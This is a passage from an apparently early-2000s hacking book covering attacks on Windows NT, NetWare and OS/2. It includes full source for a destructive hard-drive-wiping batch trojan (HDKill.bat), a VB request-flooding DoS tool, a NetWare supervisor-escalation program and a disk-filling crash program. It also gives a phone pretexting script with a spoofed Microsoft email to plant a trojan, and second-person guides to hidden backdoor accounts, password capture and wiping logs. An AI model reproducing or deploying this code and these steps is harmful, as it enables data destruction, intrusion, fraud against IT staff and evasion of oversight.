568


Figure 10.9 DoS implications of the telnet hack attack.

Figure 10.10 Dr. Watson to the rescue.
At this point, IIS could immediately crash, or crash upon scheduled administrative service
interruptions—essentially, upon administrative shutdown and/or service restart. The destructive
requests include the following URLs:
• www.victim.com/Scripts/Tools/Newdsn.exe?Createdatabase
• www.victim.com/Scripts/Tools/Newdsn.exe?Create
Severe Congestion
Synopsis: Custom HTTP request saturation can cause severe resource degradation.
Hack State: CPU congestion.


569

Vulnerabilities: Win NT 3x, 4, and Internet Information Server version 3, 4, 5.
Breach: Using a simple underground IIS attack software module (see Figure 10.11) that has been
programmed for an unlimited hit count, a remote attacker can cause severe CPU congestion,
resulting in resource degradation and, ultimately, potential service denial. The program shown here
was written in Visual Basic and includes only a single form (see Figure 10.12).

Figure 10.11 IIS attack via custom HTTP request saturation.

Figure 10.12 VB form for Main.frm.

570

main.frm
Private Stopper&
Private Sub Command1_Click()
On Error GoTo ErrorHandler
If Command1.Caption = "begin" Then
If IsNumeric(Text2.Text) = False Then MsgBox "Please enter a va
lid amount!", vbExclamation, "": Text2.Text = "0": Exit Sub
Command1.Caption = "stop"
Text3.Visible = True
For a = 1 To Text2.Text
If Stopper& = 1 Then Exit Sub
Do While Inet1.StillExecuting
DoEvents
Loop
Inet1.Execute Text1.Text, "GET " & Text1.Text
Text3.Text = Text3.Text + 1
Next a
Else
Stopper& = 1
Command1.Caption = "begin"
Text3.Visible = False
End If
Exit Sub
ErrorHandler:
MsgBox "Please enter a valid web server!", vbInformation, ""
Exit Sub
End Sub
System Control

The purpose of this section is to re-create a common system control attack on Win NT servers.
Attacks like this one against IT staff happen almost everyday. For simplicity, this hack is broken into
a few effortless steps:
Step 1: The Search
In this step, the attacker chooses an IT staff victim. Whether the attacker already knows the victim or
searches the victim’s company Web site, it takes very little effort to perform some social engineering
to reveal a target email address. Remarkably, some sites actually post IT staff support email
addresses, and more remarkably, individual names, addresses, and even photos.
This sample social engineering technique was like taking candy from a baby:
• Hacker: “Good morning; my name is Joe Hacker from Microsoft. Please transfer me to your
IT department. They are expecting my call as I am responding to a support call, ticket number
110158.”
• Reception: “Oh, okay. Do you have the name of the person you are trying to reach?”
• Hacker: “No, sorry… The caller didn’t leave a name… wait, let me check… (sound of
hacker typing on the keyboard). Nope, only this contact number.’’
• Reception: “I’ll transfer you to Tom; he’s in IT. He’ll know who to transfer you to.”
• Tom: “Hello?”
• Hacker: “Good morning, Tom; my name is Joe Hacker, from Microsoft support. I’m
responding to a support call, ticket number 110158, and I’m making this call to put your staff
on our automated NT security alert list.”


571

• Tom: “Whom were you trying to reach?”
• Hacker: “Our terminals are down this morning; all I have is this contact number. All I need
is an IT staff email address to add to our automated NT security alert list. When new patches
are available for any substantiated NT vulnerabilities, the recipient will receive updates.
Currently, three new patches are available in queue. Also… ” (interrupted)
• Tom: “Cool; it’s a pain trying to keep up with these patches.”

• Hacker: “It says here your primary Web server is running IIS. Which version is it?”
• Tom: “Believe it or not, it’s 3.0. We’re completely swamped, so we’ve put this on the back
burner. You can use my address for the advisories; it’s ”
• Hacker: “Consider it done, ticket closed. Have a nice day.”
Step 2: The Alert
During this step, the attacker decides on the remote-control daemon and accompanying message. In
this particular case, the attacker chose phAse Zero:
Port: 555, 9989
Service: Ini-Killer, NeTAdmin, phAse Zero, Stealth Spy
Hacker’s Strategy: Aside from spy features and file transfer, the most important purpose of these
Trojans is to destroy the target system. The only saving grace is that these daemons can only infect a
system upon execution of setup programs that need to be run on the host.
Using a mail-spoofing program, as mentioned earlier in this book, the attacker’s message arrived
(spoofed from Microsoft):
>On 10 Oct 2000, at 18:09, wrote:
>
>Issue
>=====
>This vulnerability involves the HTTP GET method, which is used to obtain
>information from an IIS Web server. Specially malformed GET requests can
>create a denial-of-service situation that consumes all server resources,
>causing a server to “hang.” In some cases, the server can be put back into
>service by stopping and restarting IIS; in others, the server may need to
>be rebooted. This situation cannot happen accidentally. The malformed GET
>requests must be deliberately constructed and sent to the server. It is
>important to note that this vulnerability does not allow data on the
>server to be compromised, nor does it allow any privileges on it to be usurped.


572


>
>Affected Software Versions
>==========================
> - Microsoft Internet Information Server, version 3.0 and 4.0, on x86 and
>Alpha platforms.
>
>What Customers Should Do
>========================
>The attached patch for this vulnerability is fully supported and should be applied
> immediately, as all systems are determined to be at risk of attack. Microsoft recommends
>that customers evaluate the degree of risk that this vulnerability poses to their systems,
>based on physical accessibility, network, and Internet connectivity, and other factors.
>
>
>Obtaining Support on This Issue
>===============================
>This is a supported patch. If you have problems installing
>this patch, or require technical assistance with this patch,
>please contact Microsoft Technical Support. For information
>on contacting Microsoft Technical Support, please see
>
>
>
>Revisions
>=========
> - October 10, 2000: Bulletin Created
>



573

>
>For additional security-related information about Microsoft products,
>please visit
>
>
>
>
>THE INFORMATION PROVIDED IN THE MICROSOFT KNOWLEDGE BASE IS PROVIDED
"AS-
>IS” WITHOUT WARRANTY OF ANY KIND. MICROSOFT DISCLAIMS ALL
WARRANTIES, EITHER
>EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF MERCHANTABILITY AND
>FITNESS FOR A PARTICULAR PURPOSE. IN NO EVENT SHALL MICROSOFT
CORPORATION OR ITS
>SUPPLIERS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT,
INDIRECT,
>INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES,
>EVEN IF MICROSOFT CORPORATION OR ITS SUPPLIERS HAVE BEEN ADVISED OF
THE
>POSSIBILITY OF SUCH DAMAGES. SOME STATES DO NOT ALLOW THE EXCLUSION
OR
>LIMITATION OF LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES SO
THE
>FOREGOING LIMITATION MAY NOT APPLY.
>
>(c) 2000 Microsoft Corporation. All rights reserved. Terms of Use.
>
> *******************************************************************

>You have received this email bulletin as a result of your registration
>to the Microsoft Product Security Notification Service. You may


574

>unsubscribe from this email notification service at any time by sending
>an email to MICROSOFT_SECURITY-SIGNOFF-

>The subject line and message body are not used in processing the request,
>and can be anything you like.
>
>For more information on the Microsoft Security Notification Service
>please visit For
>security-related information about Microsoft products, please visit the
>Microsoft Security Advisor Web site at
Step 3: Another Successful Victim
During this step, the attacker simply waits a few days before exercising complete remote control with
the phAse zero client, as shown in Figure 10.13.
Miscellaneous Mayhem
Windows 3x, 9x, 2000
Hack State: Hard drive obliteration.
File: HDKill.bat.
Synopsis: Some hackers enjoy generating havoc among their victims. This nasty hard-drive killer,
for example, has been attached to countless emails,
Figure 10.13 Complete control with phAse Zero.


575


and distributed with game evaluations as a ReadMe.bat file. In other cases, hackers go to the trouble
of breaking into systems only to add this file to the system bootup process. Careful inspection of the
code will reveal its purpose.
Hdkill.bat
@echo off
:start
cls
echo PLEASE WAIT WHILE PROGRAM LOADS…
call attrib -r -h c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo call format c: /q /u /autotest >nul >>c:\autoexec.bat
call attrib +r +h c:\autoexec.bat >nul

set drive=
set alldrive=c d e f g h i j k l m n o p q r s t u v w x y z
echo @echo off >drivechk.bat
echo @prompt %%%%comspec%%%% /f /c vol %%%%1: $b find "Vol" > nul >
{t}.bat
%comspec% /e:2048 /c {t}.bat >>drivechk.bat
del {t}.bat
echo if errorlevel 1 goto enddc >>drivechk.bat
cls
echo PLEASE WAIT WHILE PROGRAM LOADS…
echo @prompt %%%%comspec%%%% /f /c dir %%%%1:.\/ad/w/-
p $b find "bytes" > nul >{t}.bat
%comspec% /e:2048 /c {t}.bat >>drivechk.bat
del {t}.bat
echo if errorlevel 1 goto enddc >>drivechk.bat
cls
echo PLEASE WAIT WHILE PROGRAM LOADS…

echo @prompt dir %%%%1:.\/ad/w/-
p $b find " 0 bytes free" > nul >{t}.bat
%comspec% /e:2048 /c {t}.bat >>drivechk.bat
del {t}.bat
echo if errorlevel 1 set drive=%%drive%% %%1 >>drivechk.bat
cls
echo PLEASE WAIT WHILE PROGRAM LOADS…
echo :enddc >>drivechk.bat
:testdrv
for %%a in (%alldrive%) do call drivechk.bat %%a >nul
del drivechk.bat >nul
:form_del
call attrib -r -h c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows reco
vers your system… >>c:\autoexec.bat
echo for %%%%a in (%drive%) do call format %%%%a: /q /u /autotest >
nul >>c:\autoexec.bat
echo cls >>c:\autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows reco
vers


576

your system… >>c:\autoexec.bat
echo for %%%%a in (%drive%) do call c:\temp.bat %%%%a Bunga >nul
>>c:\autoexec.bat
echo cls >>c:\autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows reco

vers
your system… >>c:\autoexec.bat
echo for %%%%a in (%drive%) call deltree /y %%%%a:\ >nul
>>c:\autoexec.bat
echo cls >>c:\autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows reco
vers
your system… >>c:\autoexec.bat
echo for %%%%a in (%drive%) do call format %%%%a: /q /u /autotest >
nul
>>c:\autoexec.bat
echo cls >>c:\autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows reco
vers
your system… >>c:\autoexec.bat
echo for %%%%a in (%drive%) do call c:\temp.bat %%%%a Bunga >nul
>>c:\autoexec.bat
echo cls >>c:\autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows reco
vers
your system… >>c:\autoexec.bat
echo for %%%%a in (%drive%) call deltree /y %%%%a:\ >nul
>>c:\autoexec.bat
echo cd\ >>c:\autoexec.bat
echo cls >>c:\autoexec.bat
echo echo Welcome to the land of death. Munga Bunga's Multiple Hard
Drive Killer version 4.0. >>c:\autoexec.bat
echo echo If you ran this file, then sorry, I just made it. The pur
pose
of this program is to tell you the following… >>c:\autoexec.bat

echo echo 1. To make people aware that security should not be taken
for
granted. >>c:\autoexec.bat
echo echo 2. Love is important, if you have it, truly, don't let go
of
it like I did! >>c:\autoexec.bat
echo echo 3. If you are NOT a vegetarian, then you are a murderer,
and
I'm glad your HD is dead. >>c:\autoexec.bat
echo echo 4. If you are Australian, I feel sorry for you, accept my
sympathy, you retard. >>c:\autoexec.bat
echo echo 5. Don't support the following: War, Racism, Drugs and th
e
Liberal Party.>>c:\autoexec.bat
echo echo. >>c:\autoexec.bat
echo echo Regards, >>c:\autoexec.bat
echo echo. >>c:\autoexec.bat
echo echo Munga Bunga >>c:\autoexec.bat
call attrib +r +h c:\autoexec.bat


577

:makedir
if exist c:\temp.bat attrib -r -h c:\temp.bat >nul
echo @echo off >c:\temp.bat
echo %%1:\ >>c:\temp.bat
echo cd\ >>c:\temp.bat
echo :startmd >>c:\temp.bat
echo for %%%%a in ("if not exist %%2\nul md %%2" "if exist %%2\nul

cd
%%2") do %%%%a >>c:\temp.bat
echo for %%%%a in (">ass_hole.txt") do echo %%%%a Your Gone @$$hole
!!!!
>>c:\temp.bat
echo if not exist
%%1:\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\
%%2\%
%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%
2\%%2
\%%2\%%2\%%2\%%2\nul goto startmd >>c:\temp.bat
call attrib +r +h c:\temp.bat >nul
cls
echo Initializing Variables…
for %%a in (%drive%) do call format %%a: /q /u /autotest >nul
cls
echo Initializing Variables…
echo Validating Data…
for %%a in (%drive%) do call c:\temp.bat %%a Munga >nul
cls
echo Initializing Variables…
echo Validating Data…
echo Analyzing System Structure…
for %%a in (%drive%) call attrib -r -h %%a:\ /S >nul
call attrib +r +h c:\temp.bat >nul
call attrib +r +h c:\autoexec.bat >nul
cls
echo Initializing Variables…
echo Validating Data…
echo Analyzing System Structure…

echo Initializing Application…
for %%a in (%drive%) call deltree /y %%a:\*. >nul
cls
echo Initializing Variables…
echo Validating Data…
echo Analyzing System Structure…
echo Initializing Application…
echo Starting Application…
for %%a in (%drive%) do call c:\temp.bat %%a Munga >nul
cls
echo Thank you for using a Munga Bunga product.
echo.
echo Oh and, Bill Gates rules, and he is not a geek, he is a good
looking genius.
echo.
echo Here is a joke for you…


578

echo.
echo Q). What's the worst thing about being an egg?
echo A). You only get laid once.
echo.
echo HAHAHAHA, get it? Don't you just love that one?
echo.
:end
Hack State: Password theft.
File: ProgenicMail.zip.
Synopsis: Hackers use the ProgenicMail technique to dupe victims into sending all cached system

passwords. The program operates in a simple fashion, better explained on a per-file basis:
• Psetup.dat. This file contains the custom configurations options:
[Setup]
Mail=(email address to forward passwords to)
Data=ProgenicMail (if left blank, the program will send passwords upon each execution)
• setup.dl. This file can be replaced with any .exe to be loaded to hide the true purpose of the
attack. For example, the attacker may rename a joke.exe as setup.dll. The program will then
launch setup.dll (really joke.exe) as it forwards all system passwords to the attacker.
Hack State: Unrecoverable file deletion.
File: FFK.exe.
Synopsis: After penetrating a system, hackers will attempt to delete logs and trace back evidence
with an unrecoverable file deletion utility. The purpose of this program, by PhrozeN, is to
permanently delete files very fast. For example, with Fast File Killer (shown in Figure 10.14), 4,000
files of 3–150 KB take



579

Figure 10.14 Fast File Killer in action.

Figure 10.15 Password cracking with NTCrack.
only about 30–60 seconds to delete, and the action all takes place in the background while
performing other tasks. These utilities are typically coded to completely remove files with numerous
deletions or by scrambling.
Windows NT
Hack State: Brute-force password cracking.
File: NTCrack.exe.
Synopsis: NTCrack is a common Underground password cracker for NT. Operating remotely or
locally, an attacker can port custom dictionaries on behalf of the attempted login username and/or

password. What’s unique with this particular tool is the speed at which simulated logons can be
attempted (see Figure 10.15).
Hack State: Administrative privileges exploitation.
File: NTAdmin.exe.
Synopsis: Local attackers exploit vulnerable NT guest accounts with NTAdmin. This Underground
enigma has been coded to modify general user/guest accounts on an NT domain to acquire privileged
administrative rights. The captures shown in Figure 10.16, before and after the exploit, illustrate the
group modifications from guests to administrators.
Other Exposure
This section concludes with a compilation of Underground Microsoft NT hack attacks.

This section was prepared with help from the Nomad Mobile Research Centre
(NMRC), in particular: Simple Nomad and contributors: Shadowlord, Mindgame,
The LAN God, Teiwaz, Fauzan Mirza, David Wagner, Diceman, Craigt, Ei
nar
Blaberg, Cyberius, Jungman, RX2, itsme, and Greg Miller.



580


Figure 10.16 Hacking with NTAdmin.
Common Accounts
Two accounts typically come with NT: administrator and guest. In numerous network environments,
unpassworded admin and guest accounts have been unveiled. It is possible, however, that the system
administrator has renamed the administrator account. Hackers know that by typing “NBTSTAT-A
ipaddress” reveals the new administrator account.
Passwords
• Accessing the password file. The location of the NT security database is located in

\\WINNT\SYSTEM32\CONFIG\SAM. By default, the SAM is readable, but locked since it
is in use by system components. It is possible, however, that there are SAM.SAV files that
could be read to obtain password information.
• More on cracking passwords. A standard Windows NT password is derived by converting
the user’s password to Unicode, then using MD4 to get a 16-byte value; the hash value is the
actual NT “password.’’ In order to crack NT passwords, the username and the corresponding
one-way hashes need to be extracted from the password database. This process can be
painless, by using hacker/programmer Jeremy Allison’s PWDUMP, coupled with a
password-cracking program as defined earlier in this chapter.


581

From the Console
• Information gathering. From the console on a domain controller, hackers use the following
simple steps to get a list of accounts on the target machine. With a list of user accounts, they
can target individual attacks:
1. From the User Manager, create a trusting relationship with the target.
2. Launch NT Explorer, and right-click on any folder.
3. Select Sharing.
4. From the Shared window, select Add.
5. From the Add menu, select the target NT server. This will reveal the entire group listing of
the target.
6. Select Show Users to see the entire user listing, including full names and descriptions.
Novell NetWare
Novell, Inc. (www.novell.com) is a leading provider of system operation software for all types of
corporate and private networks including intranets, extranets, and the Internet. Quickly climbing the
corporate usage ladder since 1983, Novell NetWare currently is being used in 81 percent of Fortune
500 companies in the United States (according to Harte Hanks Market Intelligence). The company
boasts greater security provision throughout the Net while accelerating e-business transformations.

Liabilities
Getting In
Hacking the Console
Synopsis: Simple techniques can facilitate console breaches.
Hack State: Administrative privileges exploitation.
Vulnerabilities: All flavors prior to version 4.11.
Breach: When NetWare administrators load NetWare loadable modules (NLMs) remote.nlm and
rspx.nlm, hackers seek a program titled rconsole.exe, typically from the //public directory. At this
point, and on the same address scheme as the administrator and/or target server, the hacker loads an
IPX packet sniffer and waits to capture the system password. Among hackers, a popular sniffer
package is SpyNet (Chapter 8 describes this package more fully). If the attacker wants to conceal
evidence of the hack, he or she erases the system log from //etc/console.log by unloading and
reloading the conlog.nlm. This starts a new log capture file over the old one, which contains the
evidence.
Stealing Supervisory Rights
Synopsis: Custom coding can modify a standard login account to have supervisor equivalence.
Hack State: Administrative privileges exploitation.
Vulnerabilities: NetWare 2x, 3x, 4x, IntraNetWare 4x.
Breach: The tempting challenge of any local hacker on a Novell network is to gain supervisory
rights. Crack98.c by renowned hacker Mnemonic sets the connection to 0 for supervisor, then creates


582

a user object in the bindery, which must have an equivalent property. At that point, the program adds
supervisor equivalent to the supervisor equivalence property, which gives the account supervisor
status.
Crack98.c
#include <stdio.h>
#include <io.h>

#include <fcntl.h>
#include <string.h>
#include <stddef.h>
#include <errno.h>
#include <direct.h>
#include <nwtypes.h>
#include <nwbindry.h>
#include <dos.h>
main(int argc, char *argv[])
{
long task;
char *account
printf("Crack 98 written by Mnemonic\n");
task = SetCurrentTask(-1L);
SetCurrentConnection(0);
account = argv[1];
while (argc > 1)
{
if (CreateBinderyObject(name, OT_USER, BF_STATIC, 0x31) == 0)
printf("The account %s has been created\n", account);
else
printf("The account %s already exists on the network\n", account);
CreateProperty(account, OUT_USER, "SECURITY_EQUALS", BF_STATIC | BF
_SET,
0x32);
if (AddBinderyObjectToSet(account, OT_USER, "SECURITY_EQUALS",
"SUPERVISOR", OT_USER) == 0)
printf("The account %s has been made supervisor equivalent\n", acco
unt);
else

printf("The account is already supervisor equivalent\n");
}
printf("You must enter an account name\n");
account = argv[1];
}
ReturnBlockOfTasks(&task, 1L);
ReturnConnection(GetCurrentConnection());
return 0;
}
Unveiling Passwords
Synopsis: Inside and local hackers can attempt to reveal common passwords.
Hack State: Password theft.


583

Vulnerabilities: All flavors prior to 4.1.
Breach: NetCrack (Figure 10.17) by Jim O’Kane is a program by which, through repeated “demon
dialer” calls to the VERIFY_PASSWORD function in NetWare’s Bindery commands, NetCrack.exe
attempts to divulge user passwords using legal queries.
Format: NETCRACK <UserID>
Common user accounts in NetWare and affiliated hardware partners include:
PRINT WANGTEK
LASER FAX
HPLASER FAXUSER

Figure 10.17 Hacking with NetCrack.
PRINTER FAXWORKS
LASERWRITER TEST
POST ARCHIVIST

MAIL CHEY_ARCHSVR
GATEWAY WINDOWS_PASSTHRU

GATE ROOT
ROUTER WINSABRE
BACKUP SUPERVISOR
System Control
Backdoor Installation
Synopsis: After gaining administrative access, hackers follow a few simple steps to install a
backdoor.


584

Hack State: Remote control.
Vulnerabilities: NetWare NDS.
Breach: After gaining access control to the NetWare O/S, hackers attempt to install a remote-control
backdoor that may go unnoticed for some time. There are six simple steps to initiate this process:
1) In NWADMIN, highlight an existing container.
2) Create a new container inside this container.
3) Create a user inside this new container.
a) Allow full trustee rights to this user’s own user object.
b) Allow this user full trustee rights to the new container.
c) Give this user supervisory equivalence.
4) Modify the Access Control List (ACL) for the new user so that he or she cannot be seen.
5) Adjust the Inherit Rights Filter on the new container so it cannot be seen.
6) Place the new container in the IT group container to install the backdoor and to enable its login to
show up in the normal tools that show active connections.
Locking Files
Synopsis: Inside and local hackers can wreak havoc by modifying file usability.

Hack State: File control.
Vulnerabilities: NetWare 2x, 3x, 4x, IntraNetWare 4x.
Breach: After gaining access to NetWare, some hackers are keen on causing chaos by locking files.
This hack attack, associated with a program called Bastard by The Grenadier (Underground
hacker/programmer) (Figure 10.18), is popular among disgruntled employees. Basically, upon
execution, the program simply asks for the path to a file for lockdown modifications. At that point,
no other user can open the file for use until the attacker closes Bastard.exe, logs off, or shuts down.
Essentially, when critical O/S operational files fall victim to this exploit, this brings networks to their
knees. The program is almost too simple to use: the only requirement is that the attacker have Read
access to the target file.


Figure 10.18 Locking files with Bastard.
Miscellaneous Mayhem
Disappearing Disk Usage
Synopsis: Hackers can crash hard drives by filling up all available space.


585

Hack State: System crash.
Vulnerabilities: NetWare 2/3.
Breach: Burn.c by the infamous hacker, Jitsu-Disk depletes available disk space by erroneously
filling up an error log file at the rate of 1 MB per minute. Remnants of this particular attack may be
found on many older NetWare systems. Apparently, the attacker does not have to be logged in to
execute this utility.
Burn.c
#include <dos.h>
typedef unsigned int uint8;


int shreq(int f, uint8 *req, int rl, uint8 *ans, int al)
{
union REGS r;
r.w.cx=rl;
r.w.dx=al;
r.w.si=((unsigned)(req));
r.w.di=((unsigned)(ans));
r.w.ax=0xf200|f;
int86(0x21,&r,&r);
}

int setconn(int c) /* connect to first server */
{
union REGS r;
r.w.ax=0xf000; /* set preferred connection nr */
r.w.dx=c+1;
int86(0x21,&r,&r);
return(r.w.ax&0xff);
}

/*
* Main prog
*/
int main()
{ int err;
uint8 *nonsense=(uint8 *)calloc(1,sizeof(uint8)*128);
err=setconn(0);
for(;;) shreq(74,nonsense,5,nonsense,0);
}
Other Exposure

This section concludes with a compilation of Underground Novell NetWare hack attacks.

This section was prepared with help from the Nomad Mobile Research Centre
(NMRC), in particular: Simple Nomad and contributors: Shadowlord, Mindgame,
The LAN God, Teiwaz, Fauzan Mirza, David Wagner, Diceman, Craigt, Einar
Blaberg, Cyberius, Jungman, RX2, itsme, and Greg Miller.


586

Accounts
• Distinguishing valid account names on Novell NetWare. Any limited account should have
enough access to allow you to run SYSCON, located in the SYS:PUBLIC directory. Once in,
type SYSCON and enter. Go to User Information to see a list of all defined accounts. You
will not see much information with a limited account, but you can get the account and the
user’s full name. If you’re in with any validity, you can run USERLST.EXE and get a list of
all valid accounts on the server.
• What if you don’t have access? In this case, you can’t try just any account name at the
LOGIN prompt. It will ask you for a password, whether the account name is valid or not; and
if it is valid and you guess the wrong password, you could be letting the administrators know
what you’re up to if Intruder Detection is on.
• To determine whether an account is valid, from a DOS prompt, use a local copy of
MAP.EXE. After you’ve loaded the NetWare TSRs up through NETX or VLM, try to map a
drive using the server name and volume SYS, for example:
MAP G:=TARGET_SERVER/SYS:APPS <enter>
• Since you are not really logged in, you will be prompted for a login ID. If it is a valid ID, you
will be prompted for a password. If not, you will immediately receive an error. Of course, if
there is no password for the ID you chose to use, you will be attached and mapped to the
server.
• You can do the same thing with ATTACH.EXE:

ATTACH TARGET_SERVER/loginidtotry <enter>
• Again, if this is valid, you will be prompted for a password, if not you’ll get an error.
• Other means to obtain supervisor access. This technique is most effective in NetWare
version 3.11 When the Supervisor is logged in, a program called NW-HACK.EXE does the
following:
1. The Supervisor password is changed to SUPER_HACKER.
2. Every account on the server is modified as supervisor equivalent
• Leaving a backdoor open, redux. When hackers have access to a system, they want a way
back in that has supervisor equivalency. You can use SUPER.EXE, written for the express
purpose of allowing the nonsupervisor user to toggle on and off supervisor equivalency. If
you used NW-Hack to obtain access, you can turn on the toggle before the administrator
removes your supervisory equivalency. If you gain access to a supervisor-equivalent account,
give the guest account super equivalency, then log in as Guest and toggle it on as well. At this
point, get back in as the original supervisor account, and remove the supervisor equivalency.
Now Guest can toggle on supervisor equivalency whenever convenient.
• Getting supervisor access, redux. If you have two volumes or some unallocated disk space,
you can use this hack to get supervisor access:
1. Dismount all volumes.
2. Rename SYS: to SYSOLD:.
3. Rename VOL1: (or equivalent) to SYS:; or just create a new SYS: on a new disk.
4. Reboot the server.
5. Mount SYS: and SYSOLD:.
6. Attach to the server as Supervisor (note: login not available).


587

7. Rename SYSOLD:SYSTEM\NET$***.SYS to NET$****.OLD.
8. Dismount volumes.
9. Rename volumes back to the correct names.

10. Reboot the server again.
11. Log in as Supervisor, this time with no password.
12. Run BINDREST.
At this point, you should be logged in as the supervisor. With these privileges, you can create a new
user as supervisor-equivalent, then use this new user to reset the supervisor’s password.
Passwords
• Accessing the password file. When accessing the password file in NetWare, all objects and
their properties are kept in the bindery files in versions 2x and 3x, and in the NDS database in
version 4.x. An example of an object might be a printer, a group, an individual’s account, and
so on. An example of an object’s properties might include an account’s password or full
username, a group’s member list, or full name. The bindery file’s attributes (or flags) in
versions 2x and 3x are denoted as Hidden and System. These files are located on the SYS:
volume in the SYSTEM subdirectory as follows:
Version 2x: NET$BIND.SYS, NET$BVAL.SYS
Version 3x: NET$OBJ.SYS, NET$PROP.SYS, NET$VAL.SYS
NET$BVAL.SYS and NET$VAL.SYS are the actual storage locations for passwords in versions 2x
and 3x, respectively. In version 4.x, however, the files are physically located in a different location.
By using the RCONSOLE utility and Scan Directory option, you can see the files in SYS:
_NETWARE:
VALUE.NDS: Part of NDS
BLOCK.NDS: Part of NDS
ENTRY.NDS: Part of NDS
PARTITIO.NDS: Type of NDS partition
MLS.000: License
VALLINCEN.DAT: License validation
• More on cracking passwords. As with most insecure LANs, for purposes of this discussion,
we’ll assume that Intruder Detection is turned off and that unencrypted passwords are
allowed. If you have access to the console, either by standing in front of it or via
RCONSOLE, you can use SETSPASS.NLM, SETSPWD.NLM, or SETPWD.NLM to reset
passwords simply by loading the NLM and passing command-line parameters:

NLM ACCOUNT(S) RESET NETWARE VERSION(S) SUPPORTED
SETSPASS.NLM Supervisor 3x
SETSPWD.NLM Supervisor 3x, 4x
SETPWD.NLM Any valid account 3x, 4x


588

If you can plant a password catcher or keystroke reader, you can get access to them with
LOGIN.EXE, located in the SYS:LOGIN directory. The best place to put a keystroke capture
program is in the workstation’s path, with the ATTRIB set as hidden. The advantage to that action is
that you’ll capture the password without NetWare knowing about it. An alternative is to replace
LOGIN.EXE by the itsme program. This program, coupled with PROP.EXE, will create a separate
property in the bindery on a version 2x or 3x server that contains the passwords. Here are the steps to
perform when using these tools:
1. Gain access to a workstation logged in as Supervisor or equivalent (or use another technique,
as described elsewhere).
2. Run the PROP.EXE file with a -C option. This creates the new property for each bindery
object.
3. Replace the LOGIN.EXE in the SYS:LOGIN directory with the itsme version.
4. Keep PROP.EXE on a floppy, and check the server with any valid login after a few days.
5. To check for captured passwords, type PROP -R after logging in. This can be redirected to a
file or printer.
Accounting and Logging
• Defeating accounting. Accounting is Novell’s technique for controlling and managing
access to the server. The admin setup rates are based on blocks read and written, service
requests, connect time, and disk storage. The account “pays” for the service by being given
some number, and the accounting server deducts for these items. Any valid account,
including nonsupervisor accounts, can check to see if Accounting is active simply by running
SYSCON and attempting to access Accounting.

To defeat Accounting, you must turn it off by taking three simple steps:
1. Spoof your address. This will depend on the network interface card (NIC); typically, you can
do it in the Link Driver section of the NET.CFG file by adding the following line:
NODE ADDRESS xxxxxxxxxxxx
where xxxxxxxxxxxx is the 12-digit MAC layer address.
2. If you are using a backdoor, activate it with SUPER.EXE.
3. Delete Accounting by running SYSCON, then selecting Accounting, Accounting Servers,
and hitting the Delete key. The last entry in the NET$ACCT.DAT file will be your login,
time-stamped with the spoofed node address.
Defeating logging. These steps require console and Supervisor access:
1. Type MODULES at the console. Look for the CONLOG.NLM to verify active logging.
2. Look on the server in SYS:ETC for a file called CONSOLE.LOG, a plain text file that you
can edit, though not while CONLOG is running.
3. Unload CONLOG at the console.
4. Delete or edit the CONSOLE.LOG file to erase track evidence.
5. Reload CONLOG.
6. Check the CONSOLE.LOG file to ensure the owner has not changed.
7. Run PURGE in the SYS:ETC directory to purge old versions of CONSOLE.LOG.
Files and Directories


589

• Viewing hidden files. Use NDIR to see hidden files and directories: NDIR *.* /S /H.
• Defeating the execute-only flag. If a file is flagged as execute-only, it can still be opened.
Try opening the file with a program that will read in executables, and perform a Save As (to
another location).
• Editing login scripts. Login scripts are stored in SYS:_NETWARE. Unlike the binary files
used in NDS, these files are completely editable by using EDIT.NLM. Performing an
RCONSOLE directory scan in SYS:_NETWARE will turn up files with extensions such as

.000, which are probably login scripts. For example, suppose you found 00021440.000:
LOAD EDIT SYS:_NETWARE\00021440.000
If it’s a login script, you’ll be able to edit and save it. This completely bypasses NDS security, and is
the main weakness here. As a result, you can use this to grant a user extra rights that can lead to a
number of compromises, including full access to the file system of any server in the tree.
OS/2
With excellent ratings and customer feedback, it’s a mystery why this operating system hasn’t made
its way to take greater predominance. IBM’s OS/2 (/www-4.ibm.com/software/os/warp) had
compatibility and stability problems until version 2.0 released in 1992. Since the addition of a new
object-oriented GUI, stable DOS compatibility, and resilient Windows software compatibility, OS/2
sales have been steadily growing. IBM’s recent release, version 4, comes standard with all of the
bells and whistles deemed necessary by consumers. The OS/2 System folder contains all the tools
necessary to manage a PC, from folder templates to the desktop schemes with drag-and-drop fonts
and colors. And connectivity configuration is a walk in the park from the Internet, file/print servers
to peer networks (see Figure 10.19).
Liabilities
Tunneling
Synopsis: Defense perimeter tunnel attack through firewall and/or proxy.

Figure 10.19 OS/2 modifications.
Hack State: Security perimeter bypass for unauthorized access.


590

Vulnerabilities: All flavors.
Breach: Excerpt from Os2tunnel/http.c.
Os2tunnel/http.c
#include <Inc Mods>
static inline ssize_t

http_method (int fd, Http_destination *dest,
Http_method method, ssize_t length)
{
char str[1024]; /* FIXME: possible buffer overflow */
Http_request *request;
ssize_t n;
if (fd == -1)
{
log_error ("http_method: fd == -1");
return -1;
}
if (dest->proxy_name == NULL)
sprintf (str, "/index.html");
else
sprintf (str, "http://%s:%d/index.html", dest->host_name, dest-
>host_port);
request = http_create_request (method, str, 1, 1);
if (request == NULL)
return -1;
sprintf (str, "%s:%d", dest->host_name, dest->host_port);
http_add_header (&request->header, "Host", str);
if (length >= 0)
{
sprintf (str, "%d", length);
http_add_header (&request->header, "Content-Length", str);
}
http_add_header (&request->header, "Connection", "close");
if (dest->proxy_authorization)
{
http_add_header (&request->header,

"Proxy-Authorization",
dest->proxy_authorization);
}
if (dest->user_agent)
{
http_add_header (&request->header,
"User-Agent",
dest->user_agent);
}
n = http_write_request (fd, request);
